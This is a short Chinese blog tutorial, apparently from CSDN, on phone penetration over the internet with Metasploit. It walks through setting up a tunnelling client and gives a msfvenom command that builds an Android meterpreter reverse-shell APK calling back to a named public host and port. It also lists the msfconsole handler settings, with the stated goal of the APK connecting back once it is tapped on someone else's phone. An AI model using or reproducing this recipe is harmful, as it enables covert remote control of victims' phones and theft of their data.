-
msf手机渗透二(实现外网渗透)
目录
一、思路概述
在内网穿透官网注册飞鸽内网穿透开通隧道,然后本地端口与公网端口绑定,这样访问公网的所有请求最后都会传入本地端口。在本地生成apk的时候使用公网IP和对应Port而对其进行监听的时候设置本地IP和port。这样app在别人手机上被点击以后会直接链接公网对应IP端口,因为公网的已经和本地的绑定了,并且在电脑监听的时候监听的是本地端口,所以最后链接返回给本地电脑。
使用公网开通隧道本质上是一个桥梁作用,连接了不同局域网之间的通信。
二、实现步骤
1.测试主机连通性
2.注册账号并开通隧道
2.下载客户端
3.配置客户端
- #解压
- tar -zxvf linux_amd64_client.tar.gz
- #进入到目录
- cd linux_amd64_client
- #赋予权限
- sudo chmod +x npc
- #启动命令
- ./npc -server=xxxxx -vkey=xxxx
至此主机与公网端口之间映射完毕。4.生成App
注:这里只是我映射了两个端口,只有知道他们三者之间是一一对应的从而完成App生成就行。
- msfvenom -p android/meterpreter/reverse_tcp lhost=free.svipss.top lport=15575 R>zzh.apk
- #msfvenom -p android/meterpreter/reverse_tcp lhost=公网地址或者网址 lport=公网端口 R>zzh.apk
5、启动msfconsole
1.加载模块
use exploit/multi/handler2.设置payload监听
set payload android/meterpreter/reverse_tcp3.设置options
- set lhost 127.0.0.1
- set lport 7890
注:App生成详情msf渗透(内网)
6.使用
7.关于 apache2的相关补充
- # 启动apache2
- service apache2 satrt
- # 对apache2的配置文件进行更改
- vim /etc/apache2/ports.conf
-
相关阅读:
浅谈Elasticsearch查询和搜索
java.lang.ClassNotFoundException: org.apache.taglibs.standard.tlv.JstlCoreTLV
分布式计算平台
04-RocketMQ源码解读
软考-防火墙技术与原理
博途PLC 1200/1500PLC MODBUS通讯优化(状态机编程)
JAVA编程思想N刷
Spring源码解析-注册配置信息
IDEA导入jar包
面向对象08:封装详解
- 原文地址:https://blog.csdn.net/weixin_63204687/article/details/127732799